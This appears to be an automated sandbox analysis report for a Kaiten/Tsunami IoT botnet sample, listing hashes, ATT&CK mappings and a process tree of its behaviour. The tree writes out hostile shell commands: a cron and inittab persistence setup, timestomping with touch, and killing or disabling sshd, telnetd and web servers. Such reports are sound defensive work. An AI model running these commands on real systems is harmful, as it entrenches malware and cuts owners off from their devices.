kaiten | 8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1

Analysis

max time kernel
32s
max time network
21s
platform
debian-12_mipsel
resource
debian12-mipsel-20240418-en
resource tags

arch:mipselimage:debian12-mipsel-20240418-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem
submitted
22-10-2024 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

irq2.elf
Size

515KB
MD5

2ad737fb9e6ce08a164ddb8386f19b16
SHA1

86e87501edbdb8b6ee6ada9497ba2b62d741decc
SHA256

8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1
SHA512

068f4f7659c1d29ac0a6510e591100fba7fa1ffc445db21ce6487d77c8b34370fce3a24b4e9ff18b8910757123f593342dd80e473c0e337e7fa504eb3a13754f
SSDEEP

12288:v/J7M48SdpPK0RkLbZLn4nQdVV05tXqozEpwK9:HplxmLbJ4sY5tlzuv

Score

10^/10

kaiten botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/735-1-0x00400000-0x005777e8-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.4qdkDR	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Indicator Removal: Timestomp 1 TTPs 4 IoCs

Adversaries may remove indicators of compromise from the host to evade detection.

defense_evasion

Timestomp

T1070.006

Processes:

shtouchshtouch

pid	Process
740	sh
744	touch
788	sh
790	touch

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

killallkillallkillallkillallkillallkillallkillallkillall

description	ioc	Process
File opened for reading	/proc/698	killall
File opened for reading	/proc/821	killall
File opened for reading	/proc/201/stat	killall
File opened for reading	/proc/825/stat	killall
File opened for reading	/proc/839	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/834/stat	killall
File opened for reading	/proc/136	killall
File opened for reading	/proc/17	killall
File opened for reading	/proc/22	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/697/stat	killall
File opened for reading	/proc/9	killall
File opened for reading	/proc/37/stat	killall
File opened for reading	/proc/20	killall
File opened for reading	/proc/380	killall
File opened for reading	/proc/113/stat	killall
File opened for reading	/proc/32	killall
File opened for reading	/proc/856/stat	killall
File opened for reading	/proc/112	killall
File opened for reading	/proc/58/stat	killall
File opened for reading	/proc/832/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/45/stat	killall
File opened for reading	/proc/679	killall
File opened for reading	/proc/854/stat	killall
File opened for reading	/proc/826/stat	killall
File opened for reading	/proc/698/stat	killall
File opened for reading	/proc/25	killall
File opened for reading	/proc/42/stat	killall
File opened for reading	/proc/45	killall
File opened for reading	/proc/53/stat	killall
File opened for reading	/proc/4	killall
File opened for reading	/proc/26	killall
File opened for reading	/proc/418	killall
File opened for reading	/proc/45/stat	killall
File opened for reading	/proc/58	killall
File opened for reading	/proc/850/stat	killall
File opened for reading	/proc/9	killall
File opened for reading	/proc/42	killall
File opened for reading	/proc/348	killall
File opened for reading	/proc/111/stat	killall
File opened for reading	/proc/435/stat	killall
File opened for reading	/proc/58	killall
File opened for reading	/proc/15	killall
File opened for reading	/proc/393/stat	killall
File opened for reading	/proc/30	killall
File opened for reading	/proc/29/stat	killall
File opened for reading	/proc/47/stat	killall
File opened for reading	/proc/13	killall
File opened for reading	/proc/22	killall
File opened for reading	/proc/413/stat	killall
File opened for reading	/proc/668/stat	killall
File opened for reading	/proc/113	killall
File opened for reading	/proc/834/stat	killall
File opened for reading	/proc/30	killall
File opened for reading	/proc/31	killall
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/34/stat	killall
File opened for reading	/proc/418	killall
File opened for reading	/proc/348/stat	killall
File opened for reading	/proc/1	killall
File opened for reading	/proc/381	killall

/tmp/irq2.elf
/tmp/irq2.elf
1⤵
PID:735
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/irq2.elf"
  2⤵
  - Indicator Removal: Timestomp
  PID:740
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/irq2.elf
    3⤵
    - Indicator Removal: Timestomp
    PID:744
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/irq2.elf\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
  2⤵
  PID:747
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:750
- - /usr/bin/grep
    grep -v /tmp/irq2.elf
    3⤵
    PID:751
- - /usr/bin/grep
    grep -v "no cron"
    3⤵
    PID:752
- - /usr/bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:753
- /bin/sh
  sh -c "echo \"* * * * * /tmp/irq2.elf > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
  2⤵
  PID:758
- /bin/sh
  sh -c "crontab /var/run/.x00740882966"
  2⤵
  PID:762
- - /usr/bin/crontab
    crontab /var/run/.x00740882966
    3⤵
    - Creates/modifies Cron job
    PID:764
- /bin/sh
  sh -c "rm -rf /var/run/.x00740882966"
  2⤵
  PID:767
- - /usr/bin/rm
    rm -rf /var/run/.x00740882966
    3⤵
    PID:768
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/irq2.elf\" > /etc/inittab2"
  2⤵
  PID:771
- - /usr/bin/cat
    cat /etc/inittab
    3⤵
    PID:773
- - /usr/bin/grep
    grep -v /tmp/irq2.elf
    3⤵
    PID:774
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/irq2.elf\" >> /etc/inittab2"
  2⤵
  PID:777
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:780
- - /usr/bin/cat
    cat /etc/inittab2
    3⤵
    PID:783
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:785
- - /usr/bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:786
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  - Indicator Removal: Timestomp
  PID:788
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    - Indicator Removal: Timestomp
    PID:790
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:792
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:793
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:794
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:796
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:798
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:800
- /bin/sh
  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:817
- - /usr/bin/cat
    cat /var/run/httpd.pid
    3⤵
    PID:820
- /bin/sh
  sh -c "service httpd stop > /dev/null 2>&1 &"
  2⤵
  PID:819
- /bin/sh
  sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
  2⤵
  PID:822
- /bin/sh
  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
  2⤵
  PID:824
- /bin/sh
  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:826
- - /usr/bin/cat
    cat /var/run/thttpd.pid
    3⤵
    PID:831
- /bin/sh
  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
  2⤵
  PID:830
- /bin/sh
  sh -c "nvram set http_enable=0 > /dev/null 2>&1"
  2⤵
  PID:835
- /bin/sh
  sh -c "killall -9 httpd > /dev/null 2>&1 &"
  2⤵
  PID:836
- /bin/sh
  sh -c "service telnetd stop > /dev/null 2>&1 &"
  2⤵
  PID:838
- /bin/sh
  sh -c "service sshd stop > /dev/null 2>&1 &"
  2⤵
  PID:840
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:843
- /bin/sh
  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
  2⤵
  PID:847
- /bin/sh
  sh -c "killall -9 dropbear > /dev/null 2>&1 &"
  2⤵
  PID:852
- /bin/sh
  sh -c "killall -9 sshd > /dev/null 2>&1 &"
  2⤵
  PID:858
- /bin/sh
  sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
  2⤵
  PID:860

/usr/bin/killall
killall -9 mini_httpd
1⤵
- Reads runtime system information
PID:823

/usr/bin/killall
killall -9 minihttpd
1⤵
- Reads runtime system information
PID:825

/usr/sbin/service
service httpd stop
1⤵
PID:821
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:827
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:828
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:833
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:834

/usr/bin/killall
killall -9 httpd
1⤵
- Reads runtime system information
PID:837

/usr/sbin/service
service telnetd stop
1⤵
PID:839
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:842
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:844
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:853
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:851

/usr/sbin/service
service sshd stop
1⤵
PID:841
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:845
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:848
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:855
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:856

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:846

/usr/bin/killall
killall -9 utelnetd
1⤵
- Reads runtime system information
PID:850

/usr/bin/killall
killall -9 dropbear
1⤵
- Reads runtime system information
PID:857

/usr/bin/killall
killall -9 sshd
1⤵
- Reads runtime system information
PID:859

/usr/bin/killall
killall -9 lighttpd
1⤵
- Reads runtime system information
PID:861

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:821

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:821

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:821

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:821

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:841

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:841

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:841

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:841

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:839

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:839

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:839

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:839

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Indicator Removal

T1070

Timestomp

T1070.006

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
29B

MD5
e37e60ad9e124f50e65e6c87f31b7dd7

SHA1
6faddf303b76db407dcdd67669fb7ef5f6fc82dd

SHA256
e50050f513dd3f3569e376a0cdc13567d85fe4d1b18bbce86292d57285a557df

SHA512
55c6c8f6f8c6229db575c754c8a27b946045f0d28f8f3404800e89276f60604a8b66c07c2561680093a76c6546e98f1d4dd0e45eddf0c711cbbf8b8580b60c77

Download Submit
/run/.x00740882966

Filesize
43B

MD5
97817fbc4195275816a7f30cd1059a74

SHA1
f40fba8bbae4c1bafe7c9b81c381a734639d42e7

SHA256
4bdb89a7a673e115f33c2a4238859522143670e865bee04a4c7f2eb037f1e634

SHA512
1888ad566a977f2890f1ffcbf59d6fad4f9831503d3b8b2bf33600362133a34b8332182bccf13532f9164231c5d108c2c6a870a046faf19a981bf3f6c786320e

Download Submit
/var/spool/cron/crontabs/tmp.4qdkDR

Filesize
239B

MD5
63b828ab583274d46167dd12c43e908f

SHA1
8dfaeb8483a29b9f2f55b3ec0a66e49afa743de9

SHA256
935589b135a755739d3a7fe9ad8840e74b2205caf78f689859c80a1f44592a63

SHA512
a8d9297beb4ba3210bcbdb945db039db5fde9dee4ba02bd69a870fc144deef0a367aa355c416a65d1a98b149bf7bc2b4e5fd814988d4182e3e7c4fa921494646

Download Submit
memory/735-1-0x00400000-0x005777e8-memory.dmp

Download